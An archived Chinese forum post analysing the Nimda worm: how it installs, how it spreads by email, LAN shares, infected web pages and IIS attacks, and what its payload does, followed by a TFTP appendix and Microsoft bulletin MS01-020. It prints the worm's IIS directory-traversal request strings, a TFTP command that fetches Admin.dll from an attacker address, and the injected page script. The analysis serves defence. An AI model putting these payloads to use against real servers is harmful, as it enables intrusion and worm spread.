精华区 [关闭][返回]

当前位置:网易精华区>>讨论区精华>>电脑技术>>● 电脑病毒>>☆病毒资料☆>>I-Worm.Nimda病毒资料(作者:SnaiX)

主题:I-Worm.Nimda病毒资料(作者:SnaiX)
发信人: virus2001(幸福的狮子)
整理人: virus2001(2002-08-21 09:29:32), 站内信件
I-Worm.Nimda

病毒信息
发现日期: 2001/9/18 来源:
长度: 57344 bytes 类型: Internet蠕虫/病毒
传播方式: EMAIL 发作日期:
可否修复: 是 危险等级: 4
语言: 英语 工作平台: Windows
变种:
别称: Worm.Concept.57344[KingSoftAV] Nimda[F-Secure]W32.Nimda.A@mm[NAV] Win32.Nimda.A@mm [AVX]W32/Nimda.A@mm
详细资料:
I-Worm.Nimda 是一个大量发送邮件的使用多种方法传播自己的危险的蠕虫。该蠕虫的名称来自“ADMIN”的倒写。
该蠕虫病毒会通过email传播,当用户邮件的正文为空,似乎没有附件,实际上邮件中嵌入了病毒的执行代码。它会通过局域网把自己复制到共享目录中,并且攻击有漏洞的IIS机器(网站)。该蠕虫自己是一个Windows的PE格式的EXE文件,大约57KB,使用Microsoft C++编写。
如果运行了一个被感染的邮件,该蠕虫会开启一个系统漏洞。它会以README.EXE为名在自己安装在系统上,运行传播程序和有效载荷。
当攻击IIS服务器时,该蠕虫会用所谓的“Web Directory Traversal exploit”以文件名ADMIN.DLL为自己的名字复制到受害的机器上,来达到在受害机器上运行的目的。
该蠕虫包含有如下“版权”:
Concept Virus(CV) V.5, Copyright(C)2001  R.P.China
美国有关机构指出该病毒为亚洲所为,但并未指明是哪一个国家。但这应该是嫁祸中国。因为中国大陆的缩写是PR China(People’s Republic of China),而不是“RPChina”拚错自己国家缩写的可能性实在不太大,由此推测,这只病毒的作者并非中国人。
另外,由于该蠕虫和先前的蠕虫SirCam有许多相似的地方,不排除为同一作者所为。
安装
蠕虫的安装过程会根据蠕虫的不同感染方式(两种方式,分别为:运行EXE文件(从E-mail方式或从其它被感染文件的方式),和ADMIN.DLL文件(感染IIS服务器时))有所不同。
当从ADMIN.DLL安装时,该蠕虫以MMC.EXE为名,复制自己到WINDOWS目录,并且以蠕虫代码覆盖原来的MMC.EXE文件。
之后该蠕虫感染系统。它复制它自己。
1. 以名字RICHED20.DLL复制自己到WINDOWS系统目录(并且覆盖原来的同名文件)。
2. 以名字LOAD.EXE复制自己到WINDOWS系统目录。
LOAD.EXE之后就会被注册到SYSTEM.INI文件中作为自启动部分。
[boot]
 shell=explorer.exe load.exe -dontrunold

3. 该蠕虫还会以一个随机的名字MEP*.TMP和MA*.TMP把自己复制到临时目录中,例如:
mep01A2.TMP
mep1A0.TMP.exe
mepE002.TMP.exe
mepE003.TMP.exe
mepE004.TMP
EXE文件已经定为“隐藏”和“系统”属性,LOAD.EXE文件也一样。
该蠕虫之后运行他的扩散与有效载荷程序。依赖于WINDOWS的版本,该蠕虫影响EXPLORER.EXE进程并且会运行它的程序作为EXPLORER的背景进程(THREAD)。
传播
传播—EMAIL
为达发送被感染邮件的目的,该蠕虫会使用SMTP协议连接一台主机并且发送它的副本给受害的地址。
该蠕虫得到受害者EMAIL地址有两种方式:
1. 扫描*.HTM和*.HTML文件并查找EMAIL链接字符串
2. 通过使用MAPI函数连接到MICROSOFT EXCHANGE的EMAIL邮箱并且从那里获得SMTP地址和EMAIL地址。
被感染的消息使用HTML格式,类似如下内容:
Subject:      [empty or random]
Message text: [empty]
Attachment:   README.EXE
该邮件的标题文本是从文件夹:
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal
中随机挑选的一个文件的名字。
通常那些名字会是“我的文档”或者C:盘中随机挑选的文件的名字。
从被感染的信件中扩散,该蠕虫使用了“IFRAME”欺骗。它通过在Microsoft Security Bulletin (MS01-020): Incorrect MIME Header Can Cause IE to Execute E-mail Attachment http://www.microsoft.com/technet/security/bulletin/MS01-020.asp所描述的内容,开发了攻击漏洞。
修复该漏洞的补丁在:
http://www.microsoft.com/windows/ie/downloads/critical/q290108/default.asp
下载。
传播—感染EXE文件
该蠕虫寻找在注册表树中:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
所有的EXE文件。来寻找远程主机上的EXE文件,并试着感染这些文件。但感染的方式和以前的病毒有所不同,它会把原文件作为资源存储在新文件中,运行新文件时再当作可执行文件来调用。奇怪的是Nimda过滤掉了WinZip32.exe,它不会感染WinZip32.exe。有些时候这段程序并不会被激活,EXE文件有可能不会被感染。
感染步骤如下:首先,该蠕虫检查是否该文件已经被感染了。如果该文件没有被感染,该蠕虫会在临时目录中生成一个自己的副本。受害文件就会被植入到这蠕虫的副本中。生成的新文件就会覆盖原来的干净的文件使其成为被感染文件。被感染的可执行文件比57344字节要大。当一个被感染的文件被执行时,该蠕虫会分解出一个原始的清洁的文件来作为一个临时文件,并且连同蠕虫本身一起执行。这样,就起到了很好的伪装作用,该蠕虫的感染也不会被注意到。
感染结构如下:
  Header (文件头)
  Code section (代码片断)
  Data section (数据片断)
  Resources section: (资源片断)
    some worm resources (一些蠕虫的资源)
victim EXE file (as is)  <--- here is original file (受害的EXE文件(被当作了资源)
some other worm resources (一些蠕虫的资源)
Relocation table (重置表)
在执行阶段,该蠕虫会尝试删除它自己的副本。如果该文件被使用或者被锁定,该蠕虫会创建Wininit.ini用来在系统启动之前删除它自己。
感染文件时,该蠕虫会在Windows Temporary folder创建两个临时文件,如:
mep[nr][nr][letter][nr].TMP.exe
mep[nr][nr][letter][nr].TMP
这两个文件都会被隐藏并且被设置为系统属性。
传播—局域网
该蠕虫会用三种不同的方式扫描本地驱动器和共享的(映射)远程驱动器,并且感染在那里的所有易受影响的目录。
该蠕虫创建它自己为一个随机挑选名字的.EML文件(95%的可能性)或者是.NWS文件(5%的可能性)。结果这些EML和NWS文件可以在被感染的机器上(和局域网上)的任何位置被见到——可能会有数千个。这些文件以一个EMAIL的形式包含了一个蠕虫的副本。
该EMAIL形式是一个用MIME格式的带有蠕虫副本的HTML的EMAIL消息,包含有为蠕虫特制的IFRAME欺骗,如上所述。当打开这个消息时则会马上感染一个易受攻击的机器。
传播—网站
在本地机器上时,该蠕虫扫描所有固定硬盘并且寻找如下文件名+扩展名的文件:
*DEFAULT*,*INDEX*,*MAIN*,*README*+.HTML,.HTM,.ASP
(*NAME*为文件名中包含的某些字符串)也就是说该蠕虫查找标准的网页文件。
如果这样的一个文件被蠕虫发现,该蠕虫会复制一个名为README.EML的EMAIL形式的副本并且添加到被害机器的HTM/HTML/ASP文件中。蠕虫会在其中添加一个JAVASCRIPT程序来使用户在打开HTM/HTML/ASP文件时自动打开README.EML文件,从而激活蠕虫。
所加的JAVASCRIPT代码如下:
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
结果就是改蠕虫影响网页并且会扩散到访问这些网页的用户的机器上——易受攻击的机器仅仅是通过浏览网页也会被感染!
传播—IIS攻击
为了上传蠕虫的文件到一个受害的机器上,该蠕虫使用了所谓的“Web Directory Traversal exploit”(Unicode_Hole),使一个要被感染的(当前的)机器上的临时的TFTP服务器活动,处理来自受害(远程的)机器的“get data”命令,这和IIS-Worm.BlueCode比较相似。
该蠕虫会做如下扫描:
GET /scripts/root.exe?/c+dir HTTP/1.0 
GET /MSADC/root.exe?/c+dir HTTP/1.0 
GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0 
GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0 
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 
GET/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 
GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 
GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 
蠕虫寻找Unicode漏洞和CodeRed II建立的Root.exe这个后门,一旦发现有弱点的系统就使用类似下面的命令:
GET /scripts/root.exe?/c+tftp -i xxx.xxx.xxx.xxx GET Admin.dll Admin.dll HTTP/1.0
    把文件传到主机上去,然后再:
GET /scripts/Admin.dll HTTP/1.0
结果就是该蠕虫用上传到受害机器上它的副本,名为ADMIN.DLL并且在那里激活它。
感染其它的IIS服务器该蠕虫会打开60或200个线程(后台处理,它们的数量依赖于不同的情形),之后每个线程扫描随机挑选地IP地址并且尝试攻击它们。
关于TFTP的有关内容请参看附录。
有效载荷
有效载荷程序添加“Guest”用户到管理员用户组(Administrators UserGroup)(结果“Guest”用户对被感染的机器拥有了完全访问权)。该蠕虫也会打开所有的本地驱动器用于共享,还会移除安全设置。
受影响的注册表键值有:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\
  Flags = 
  Parm1enc =
  Parm2enc =

 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\X$
  Flags =
  Parm1enc =
  Parm2enc =
  Path = 
  Remark = 
  Type = 
其中X$为C$到Z$
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
  Hidden
  ShowSuperHidden
  HideFileExt
这些键值被删除:
HKLM\SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security
副影响
自动署名的HTML文件可能也会受到到影响,如上所示。结果所有来自被感染的机器的消息在署名的尾部都会有蠕虫的JavaScript内容。所以蠕虫还可以用“KakWorm”蠕虫的方式传播。




附录:
TFTP
定义
TFTP,Trivial File Transfer Protocol / 简单文件传输协议。
用来下载开始安装过程所需的初始文件的协议。
TFTP命令:
将文件传输到正在运行 TFTP 服务的远程计算机或从正在运行 TFTP 服务的远程计算机传输文件。该命令只有在安装了 TCP/IP 协议后才可以使用。
tftp [-i] computer [get | put] source [destination]
参数
-i
指定二进制图像传送模式(也称为“八位字节”)。在二进制图像模式中,文件一个字节接一个字节地逐字移动。在传送二进制文件时使用该模式。
如果省略了 -i,文件将以 ASCII 模式传送。这是默认的传送模式。此模式将 EOL 字符转换为 UNIX 的回车符和个人计算机的回车符/换行符。在传送文本文件时应使用此模式。如果文件传送成功,将显示数据传输率。
computer
指定本地或远程计算机。
put
将本地计算机上的文件 destination 传送到远程计算机上的文件 source。
get
将远程计算机上的文件 destination 传送到本地计算机上的文件 source。
如果将本地计算机上的文件 file-two 传送到远程计算机上的文件 file-one,请指定 put。如果将远程计算机上的文件 file-two 传送到远程计算机上的文件 file-one,请指定 get。
因为 tftp 协议不支持用户身份验证,所以用户必须登录,并且文件在远程计算机上必须可以写入。
source
指定要传送的文件。如果本地文件指定为 -,则远程文件在 stdout 上打印出来(如果获取),或从 stdin(如果放置)读取。
destination
指定将文件传送到的位置。如果省略了 destination,将假定与 source 同名。

Microsoft Security Bulletin (MS01-020)
Microsoft Security Bulletin (MS01-020)   Print 

Incorrect MIME Header Can Cause IE to Execute E-mail Attachment
Originally posted: March 29, 2001
Summary
Who should read this bulletin: Customers using Microsoft&reg; Internet Explorer. 
Impact of vulnerability: Run code of attacker’s choice. 
Recommendation: Customers using IE should install the patch immediately. 
Affected Software: 
&#8226; Microsoft Internet Explorer 5.01 
&#8226; Microsoft Internet Explorer 5.5 
Note: Internet Explorer 5.01 Service Pack 2 is not affected by this vulnerability. 
 Technical details
 Frequently asked questions 
Patch availability
Download locations for this patch 
&#8226; http://www.microsoft.com/windows/ie/download/critical/Q290108/default.asp 
Note: The above patch has been supserseded by the IE 5.01 and 5.5 patches discussed in MS01-027 
 Additional information about this patch
Other information:
Acknowledgments 
Microsoft thanks  Juan Carlos Cuartango (http://www.kriptopolis.com) for reporting this issue to us and working with us to protect customers. 
Support: 
&#8226; Microsoft Knowledge Base article Q290108 discusses this issue and will be available approximately 24 hours after the release of this bulletin. Knowledge Base articles can be found on the Microsoft Online Support web site. 
&#8226; Technical support is available from Microsoft Product Support Services. There is no charge for support calls associated with security patches. 
Security Resources: The Microsoft TechNet Security Web Site provides additional information about security in Microsoft products. 
Disclaimer: 
The information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. 
Revisions: 
&#8226; V1.0 (March 29, 2001): Bulletin Created.
&#8226; V1.1 (May 25, 2001): Bulletin revised to note that the patch for this issue has been included in the patch released for MS01-027. 
&#8226; V1.2 (September 21, 2001): Bulletin updated to discuss need to perform a Full or Typical Install when eliminating this vulnerability via an IE 6 upgrade. 



----
幸福的狮子
服务为网民
网易(广州)社区电脑病毒版

我的电子邮件: [email protected]
QQ:76025852 

常用下载:

新欢乐时光清除器(Redlof,VBS.KJ)
Nimda清除器(Nimda,Concept,China-1)
求职信清除器(WantJob,Klez)
注册表安全工具集(RegTools)                  

[关闭][返回]